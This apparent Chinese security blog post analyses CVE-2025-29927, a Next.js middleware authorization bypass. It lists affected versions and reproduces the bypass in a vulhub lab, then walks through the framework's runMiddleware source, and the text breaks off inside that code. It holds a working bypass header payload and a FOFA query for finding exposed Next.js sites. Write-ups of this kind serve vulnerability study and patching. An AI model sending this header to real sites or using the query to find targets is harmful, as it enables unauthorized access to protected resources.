

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/127937198.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="IE">
  <meta name="keywords" content="">
  
    <meta name="description" content="Next.js 中间件鉴权绕过漏洞漏洞基础原理Next.js 是一个基于 React 的流行 Web 应用框架，提供服务器端渲染、静态网站生成和集成路由系统等功能。当使用中间件进行身份验证和授权时，Next.js 14.2.25 和 15.2.3 之前的版本存在授权绕过漏洞。 该漏洞允许攻击者通过操作 x-middleware-subrequest 请求头来绕过基于中间件的安全控制，从而可能获得对">
<meta property="og:type" content="article">
<meta property="og:title" content="next.js-中间件鉴权绕过漏洞">
<meta property="og:url" content="https://ydnd.github.io/2025/04/10/next.js-%E4%B8%AD%E9%97%B4%E4%BB%B6%E9%89%B4%E6%9D%83%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="IEeee">
<meta property="og:description" content="Next.js 中间件鉴权绕过漏洞漏洞基础原理Next.js 是一个基于 React 的流行 Web 应用框架，提供服务器端渲染、静态网站生成和集成路由系统等功能。当使用中间件进行身份验证和授权时，Next.js 14.2.25 和 15.2.3 之前的版本存在授权绕过漏洞。 该漏洞允许攻击者通过操作 x-middleware-subrequest 请求头来绕过基于中间件的安全控制，从而可能获得对">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ydnd.github.io/images/next.js/image-20250410083953320.png">
<meta property="og:image" content="https://ydnd.github.io/images/next.js/image-20250410084445621.png">
<meta property="og:image" content="https://ydnd.github.io/images/next.js/image-20250410084848558.png">
<meta property="og:image" content="https://ydnd.github.io/images/next.js/image-20250410100131371.png">
<meta property="og:image" content="https://ydnd.github.io/images/next.js/9a2d3e47f55c82a44d04345781818f58.png">
<meta property="og:image" content="https://ydnd.github.io/images/next.js/image-20250410102039484.png">
<meta property="article:published_time" content="2025-04-10T02:29:03.000Z">
<meta property="article:modified_time" content="2025-05-19T08:12:48.490Z">
<meta property="article:author" content="IE">
<meta property="article:tag" content="next.js-中间件鉴权绕过">
<meta property="article:tag" content="CVE-2025-29927">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://ydnd.github.io/images/next.js/image-20250410083953320.png">
  
  
  
  <title>next.js-中间件鉴权绕过漏洞 - IEeee</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"ydnd.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>IE</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>Links</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/archive.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="next.js-中间件鉴权绕过漏洞"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-04-10 10:29" pubdate>
          April 10, 2025 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.3k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          28 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">next.js-中间件鉴权绕过漏洞</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Next-js-中间件鉴权绕过漏洞"><a href="#Next-js-中间件鉴权绕过漏洞" class="headerlink" title="Next.js 中间件鉴权绕过漏洞"></a>Next.js 中间件鉴权绕过漏洞</h1><h2 id="漏洞基础原理"><a href="#漏洞基础原理" class="headerlink" title="漏洞基础原理"></a>漏洞基础原理</h2><p>Next.js 是一个基于 React 的流行 Web 应用框架，提供服务器端渲染、静态网站生成和集成路由系统等功能。当使用中间件进行身份验证和授权时，Next.js 14.2.25 和 15.2.3 之前的版本存在授权绕过漏洞。</p>
<p>该漏洞允许攻击者通过操作 <code>x-middleware-subrequest</code> 请求头来绕过基于中间件的安全控制，从而可能获得对受保护资源和敏感数据的未授权访问。</p>
<h2 id="受影响的版本"><a href="#受影响的版本" class="headerlink" title="受影响的版本"></a>受影响的版本</h2><p>&gt;&#x3D; 13.0.0，&lt; 13.5.9 	</p>
<p>&gt;&#x3D; 14.0.0，&lt; 14.2.25</p>
<p>&gt;&#x3D; 15.0.0，&lt; 15.2.3</p>
<p>&gt;&#x3D; 11.1.4，&lt; 12.3.5</p>
<h2 id="对应修补版本"><a href="#对应修补版本" class="headerlink" title="对应修补版本"></a>对应修补版本</h2><p>13.5.9</p>
<p>14.2.25</p>
<p>15.2.3</p>
<p>12.3.5</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="fofa语法："><a href="#fofa语法：" class="headerlink" title="fofa语法："></a>fofa语法：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cobol">app=&quot;next.js&quot;<br></code></pre></td></tr></table></figure>

<h3 id="注意"><a href="#注意" class="headerlink" title="注意"></a>注意</h3><p>需要找到一个目标需要凭证的页面或者目录，用于绕过</p>
<h3 id="漏洞复现-利用"><a href="#漏洞复现-利用" class="headerlink" title="漏洞复现-利用"></a>漏洞复现-利用</h3><p>我们使用vulhub进行复现 一个基于 Next.js 15.2.2 的存在漏洞的应用</p>
<h4 id="1-打开网站后强制跳转到登录页面"><a href="#1-打开网站后强制跳转到登录页面" class="headerlink" title="1.打开网站后强制跳转到登录页面"></a>1.打开网站后强制跳转到登录页面</h4><p><img src="/images/next.js/image-20250410083953320.png" srcset="/img/loading.gif" lazyload alt="image-20250410083953320"></p>
<h4 id="2-现在进行绕过-我们访问3000端口进行抓包"><a href="#2-现在进行绕过-我们访问3000端口进行抓包" class="headerlink" title="2.现在进行绕过 我们访问3000端口进行抓包"></a>2.现在进行绕过 我们访问3000端口进行抓包</h4><p>在请求头添加 ‘x-middleware-subrequest’ 值为: ‘middleware:middleware:middleware:middleware:middleware’</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs less"><span class="hljs-attribute">x-middleware-subrequest</span>: <span class="hljs-attribute">middleware</span>:<span class="hljs-attribute">middleware</span>:<span class="hljs-attribute">middleware</span>:<span class="hljs-attribute">middleware</span>:middleware<br></code></pre></td></tr></table></figure>

<p>或</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware<br></code></pre></td></tr></table></figure>

<p><img src="/images/next.js/image-20250410084445621.png" srcset="/img/loading.gif" lazyload alt="image-20250410084445621"></p>
<h4 id="进行对比，直接访问响应"><a href="#进行对比，直接访问响应" class="headerlink" title="进行对比，直接访问响应"></a>进行对比，直接访问响应</h4><p><img src="/images/next.js/image-20250410084848558.png" srcset="/img/loading.gif" lazyload alt="image-20250410084848558"></p>
<h2 id="漏洞原理剖析"><a href="#漏洞原理剖析" class="headerlink" title="漏洞原理剖析"></a>漏洞原理剖析</h2><h3 id="旧版本绕过-12-2之前"><a href="#旧版本绕过-12-2之前" class="headerlink" title="旧版本绕过-12.2之前"></a>旧版本绕过-12.2之前</h3><p><img src="/images/next.js/image-20250410100131371.png" srcset="/img/loading.gif" lazyload alt="image-20250410100131371"></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-comment">// 从请求头中获取 &#x27;x-middleware-subrequest&#x27; 字段的值</span><br><span class="hljs-comment">// 该字段可能包含了需要跳过执行的中间件名称列表</span><br><span class="hljs-keyword">const</span> subreq = params.<span class="hljs-property">request</span>.<span class="hljs-property">headers</span>[<span class="hljs-string">`x-middleware-subrequest`</span>];<br><br><span class="hljs-comment">// 判断 subreq 是否为字符串类型</span><br><span class="hljs-comment">// 如果是字符串，则按冒号 &#x27;:&#x27; 分割成数组；如果不是字符串，则将 subrequests 设为空数组</span><br><span class="hljs-comment">// 这样做是为了将可能存在的多个需要跳过的中间件名称解析出来</span><br><span class="hljs-keyword">const</span> subrequests = <span class="hljs-keyword">typeof</span> subreq === <span class="hljs-string">&#x27;string&#x27;</span> ? subreq.<span class="hljs-title function_">split</span>(<span class="hljs-string">&#x27;:&#x27;</span>) : [];<br><br><span class="hljs-comment">// 创建一个新的 Headers 对象 allHeaders，用于存储所有中间件响应头信息</span><br><span class="hljs-comment">// 后续会将各个中间件的有效响应头合并到这个对象中</span><br><span class="hljs-keyword">const</span> allHeaders = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Headers</span>();<br><br><span class="hljs-comment">// 初始化一个变量 result，用于存储中间件执行的结果</span><br><span class="hljs-comment">// 初始值设为 null，在后续中间件执行过程中会被赋值为具体的 FetchEventResult 对象</span><br><span class="hljs-keyword">let</span> <span class="hljs-attr">result</span>: <span class="hljs-title class_">FetchEventResult</span> | <span class="hljs-literal">null</span> = <span class="hljs-literal">null</span>;<br><br><span class="hljs-comment">// 遍历中间件列表</span><br><span class="hljs-comment">// this.middleware 是当前服务器实例所配置的中间件数组</span><br><span class="hljs-comment">// 如果 this.middleware 为 null 或 undefined，则使用空数组替代</span><br><span class="hljs-keyword">for</span> (<span class="hljs-keyword">const</span> middleware <span class="hljs-keyword">of</span> <span class="hljs-variable language_">this</span>.<span class="hljs-property">middleware</span> || []) &#123;<br>    <span class="hljs-comment">// 检查当前中间件是否匹配请求的路径</span><br>    <span class="hljs-comment">// middleware.match 是一个函数，用于判断当前中间件是否应该处理该请求</span><br>    <span class="hljs-comment">// params.parsedUrl.pathname 是解析后的请求路径</span><br>    <span class="hljs-keyword">if</span> (middleware.<span class="hljs-title function_">match</span>(params.<span class="hljs-property">parsedUrl</span>.<span class="hljs-property">pathname</span>)) &#123;<br>        <span class="hljs-comment">// 检查当前中间件对应的边缘函数是否存在</span><br>        <span class="hljs-comment">// hasMiddleware 是一个异步函数，用于验证指定页面的中间件是否存在</span><br>        <span class="hljs-comment">// middleware.page 是中间件对应的页面路径，middleware.ssr 表示是否为服务端渲染</span><br>        <span class="hljs-keyword">if</span> (!(<span class="hljs-keyword">await</span> <span class="hljs-variable language_">this</span>.<span class="hljs-title function_">hasMiddleware</span>(middleware.<span class="hljs-property">page</span>, middleware.<span class="hljs-property">ssr</span>))) &#123;<br>            <span class="hljs-comment">// 如果中间件对应的边缘函数不存在，打印警告信息</span><br>            <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">warn</span>(<span class="hljs-string">`The Edge Function for <span class="hljs-subst">$&#123;middleware.page&#125;</span> was not found`</span>);<br>            <span class="hljs-comment">// 跳过当前中间件，继续处理下一个中间件</span><br>            <span class="hljs-keyword">continue</span>;<br>        &#125;<br><br>        <span class="hljs-comment">// 确保中间件已准备好执行</span><br>        <span class="hljs-comment">// ensureMiddleware 是一个异步函数，用于确保指定页面的中间件可以正常执行</span><br>        <span class="hljs-comment">// 可能会涉及到加载中间件代码、初始化环境等操作</span><br>        <span class="hljs-keyword">await</span> <span class="hljs-variable language_">this</span>.<span class="hljs-title function_">ensureMiddleware</span>(middleware.<span class="hljs-property">page</span>, middleware.<span class="hljs-property">ssr</span>);<br><br>        <span class="hljs-comment">// 获取当前中间件的详细信息</span><br>        <span class="hljs-comment">// getMiddlewareInfo 是一个函数，根据传入的配置信息返回中间件的详细信息</span><br>        <span class="hljs-comment">// 包括中间件的名称、路径、环境配置等</span><br>        <span class="hljs-keyword">const</span> middlewareInfo = <span class="hljs-title function_">getMiddlewareInfo</span>(&#123;<br>            <span class="hljs-attr">dev</span>: <span class="hljs-variable language_">this</span>.<span class="hljs-property">renderOpts</span>.<span class="hljs-property">dev</span>, <span class="hljs-comment">// 是否为开发环境</span><br>            <span class="hljs-attr">distDir</span>: <span class="hljs-variable language_">this</span>.<span class="hljs-property">distDir</span>, <span class="hljs-comment">// 构建产物目录</span><br>            <span class="hljs-attr">page</span>: middleware.<span class="hljs-property">page</span>, <span class="hljs-comment">// 中间件对应的页面路径</span><br>            <span class="hljs-attr">serverless</span>: <span class="hljs-variable language_">this</span>.<span class="hljs-property">_isLikeServerless</span>, <span class="hljs-comment">// 是否为无服务器环境</span><br>        &#125;);<br><br>        <span class="hljs-comment">// 检查当前中间件的名称是否在需要跳过的中间件列表中</span><br>        <span class="hljs-comment">// 如果在列表中，说明该中间件不需要执行</span><br>        <span class="hljs-keyword">if</span> (subrequests.<span class="hljs-title function_">includes</span>(middlewareInfo.<span class="hljs-property">name</span>)) &#123;<br>            <span class="hljs-comment">// 创建一个默认的结果对象</span><br>            <span class="hljs-comment">// response 使用 NextResponse.next() 表示继续执行后续操作，不做额外处理</span><br>            <span class="hljs-comment">// waitUntil 是一个 Promise，这里使用 Promise.resolve() 表示立即完成</span><br>            result = &#123;<br>                <span class="hljs-attr">response</span>: <span class="hljs-title class_">NextResponse</span>.<span class="hljs-title function_">next</span>(),<br>                <span class="hljs-attr">waitUntil</span>: <span class="hljs-title class_">Promise</span>.<span class="hljs-title function_">resolve</span>(),<br>            &#125;;<br>            <span class="hljs-comment">// 跳过当前中间件，继续处理下一个中间件</span><br>            <span class="hljs-keyword">continue</span>;<br>        &#125;<br></code></pre></td></tr></table></figure>

<p><code>runMiddleware</code>函数</p>
<figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><code class="hljs kotlin"><span class="hljs-comment">/**</span><br><span class="hljs-comment"> * 异步运行中间件的方法。</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@param</span> params - 包含运行中间件所需参数的对象。</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@param</span> params.request - 传入的 HTTP 请求对象。</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@param</span> params.response - 对应的 HTTP 响应对象。</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@param</span> params.parsedUrl - 解析后的 Next.js URL 对象。</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@param</span> params.parsed - 解析后的 URL 查询参数对象。</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@param</span> params.onWarning - 可选的警告处理函数，当出现警告时会被调用。</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@returns</span> 一个 Promise，解析为 FetchEventResult 或 null。</span><br><span class="hljs-comment"> */</span><br><span class="hljs-keyword">protected</span> async runMiddleware(params: &#123;<br>    request: IncomingMessage;<br>    response: ServerResponse;<br>    parsedUrl: ParsedNextUrl;<br>    parsed: UrlWithParsedQuery;<br>    onWarning?: (warning: Error) =&gt; void;<br>&#125;): Promise&lt;FetchEventResult | <span class="hljs-literal">null</span>&gt; &#123;<br>    <span class="hljs-comment">// 调用中间件的 Beta 版本警告函数，该函数使用 execOnce 确保只执行一次。</span><br>    <span class="hljs-comment">// 此警告用于提醒开发者当前使用的是 Next.js 中间件的 Beta 版本，不保证遵循语义化版本控制。</span><br>    <span class="hljs-keyword">this</span>.middlewareBetaWarning();<br><br>    <span class="hljs-comment">// 初始化一个对象，用于存储当前匹配的页面信息，包括页面名称和参数</span><br>    <span class="hljs-keyword">const</span> page: &#123; name?: string; params?: &#123; [key: string]: string &#125; &#125; = &#123;&#125;;<br>    <span class="hljs-comment">// 检查请求的路径是否对应一个存在的页面</span><br>    <span class="hljs-keyword">if</span> (await <span class="hljs-keyword">this</span>.hasPage(params.parsedUrl.pathname)) &#123;<br>        <span class="hljs-comment">// 如果存在，将该页面的名称赋值给 page 对象</span><br>        page.name = params.parsedUrl.pathname;<br>    &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-keyword">this</span>.dynamicRoutes) &#123;<br>        <span class="hljs-comment">// 如果请求的路径不是一个普通页面，检查动态路由</span><br>        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">const</span> dynamicRoute of <span class="hljs-keyword">this</span>.dynamicRoutes) &#123;<br>            <span class="hljs-comment">// 尝试匹配动态路由</span><br>            <span class="hljs-keyword">const</span> matchParams = dynamicRoute.match(params.parsedUrl.pathname);<br>            <span class="hljs-keyword">if</span> (matchParams) &#123;<br>                <span class="hljs-comment">// 如果匹配成功，将动态路由对应的页面名称和匹配参数赋值给 page 对象</span><br>                page.name = dynamicRoute.page;<br>                page.params = matchParams;<br>                <span class="hljs-keyword">break</span>;<br>            &#125;<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-comment">// 从请求头中获取 &#x27;x-middleware-subrequest&#x27; 字段的值</span><br>    <span class="hljs-keyword">const</span> subreq = params.request.headers[`x-middleware-subrequest`];<br>    <span class="hljs-comment">// 如果该字段存在且为字符串类型，则按冒号分割成数组，否则为空数组</span><br>    <span class="hljs-keyword">const</span> subrequests = typeof subreq === <span class="hljs-string">&#x27;string&#x27;</span> ? subreq.split(<span class="hljs-string">&#x27;:&#x27;</span>) : [];<br>    <span class="hljs-comment">// 初始化一个 Headers 对象，用于合并所有中间件的响应头</span><br>    <span class="hljs-keyword">const</span> allHeaders = new Headers();<br>    <span class="hljs-comment">// 初始化结果变量，用于存储中间件运行的结果</span><br>    let result: FetchEventResult | <span class="hljs-literal">null</span> = <span class="hljs-literal">null</span>;<br><br>    <span class="hljs-comment">// 遍历所有中间件</span><br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">const</span> middleware of <span class="hljs-keyword">this</span>.middleware || []) &#123;<br>        <span class="hljs-comment">// 检查当前中间件是否匹配请求的路径</span><br>        <span class="hljs-keyword">if</span> (middleware.match(params.parsedUrl.pathname)) &#123;<br>            <span class="hljs-comment">// 检查当前中间件对应的边缘函数是否存在</span><br>            <span class="hljs-keyword">if</span> (!(await <span class="hljs-keyword">this</span>.hasMiddleware(middleware.page, middleware.ssr))) &#123;<br>                <span class="hljs-comment">// 如果不存在，输出警告信息并跳过该中间件</span><br>                console.warn(`The Edge Function <span class="hljs-keyword">for</span> $&#123;middleware.page&#125; was not found`);<br>                <span class="hljs-keyword">continue</span>;<br>            &#125;<br><br>            <span class="hljs-comment">// 确保中间件已经准备好可以运行</span><br>            await <span class="hljs-keyword">this</span>.ensureMiddleware(middleware.page, middleware.ssr);<br><br>            <span class="hljs-comment">// 获取当前中间件的信息</span><br>            <span class="hljs-keyword">const</span> middlewareInfo = getMiddlewareInfo(&#123;<br>                dev: <span class="hljs-keyword">this</span>.renderOpts.dev,<br>                distDir: <span class="hljs-keyword">this</span>.distDir,<br>                page: middleware.page,<br>                serverless: <span class="hljs-keyword">this</span>._isLikeServerless,<br>            &#125;);<br><br>            <span class="hljs-comment">// 检查当前中间件是否在子请求列表中</span><br>            <span class="hljs-keyword">if</span> (subrequests.includes(middlewareInfo.name)) &#123;<br>                <span class="hljs-comment">// 如果在，创建一个默认的响应结果并跳过该中间件的执行</span><br>                result = &#123;<br>                    response: NextResponse.next(),<br>                    waitUntil: Promise.resolve(),<br>                &#125;;<br>                <span class="hljs-keyword">continue</span>;<br>            &#125;<br><br>            <span class="hljs-comment">// 运行当前中间件</span><br>            result = await run(&#123;<br>                name: middlewareInfo.name,<br>                paths: middlewareInfo.paths,<br>                request: &#123;<br>                    headers: params.request.headers,<br>                    method: params.request.method || <span class="hljs-string">&#x27;GET&#x27;</span>,<br>                    nextConfig: &#123;<br>                        basePath: <span class="hljs-keyword">this</span>.nextConfig.basePath,<br>                        i18n: <span class="hljs-keyword">this</span>.nextConfig.i18n,<br>                        trailingSlash: <span class="hljs-keyword">this</span>.nextConfig.trailingSlash,<br>                    &#125;,<br>                    url: getRequestMeta(params.request, <span class="hljs-string">&#x27;__NEXT_INIT_URL&#x27;</span>)!,<br>                    page: page,<br>                &#125;,<br>                useCache: !<span class="hljs-keyword">this</span>.nextConfig.experimental.concurrentFeatures,<br>                onWarning: (warning: Error) =&gt; &#123;<br>                    <span class="hljs-keyword">if</span> (params.onWarning) &#123;<br>                        <span class="hljs-comment">// 如果有警告处理函数，添加中间件名称到警告信息中并调用该函数</span><br>                        warning.message += ` <span class="hljs-string">&quot;./<span class="hljs-subst">$&#123;middlewareInfo.name&#125;</span>&quot;</span>`;<br>                        params.onWarning(warning);<br>                    &#125;<br>                &#125;,<br>            &#125;);<br><br>            <span 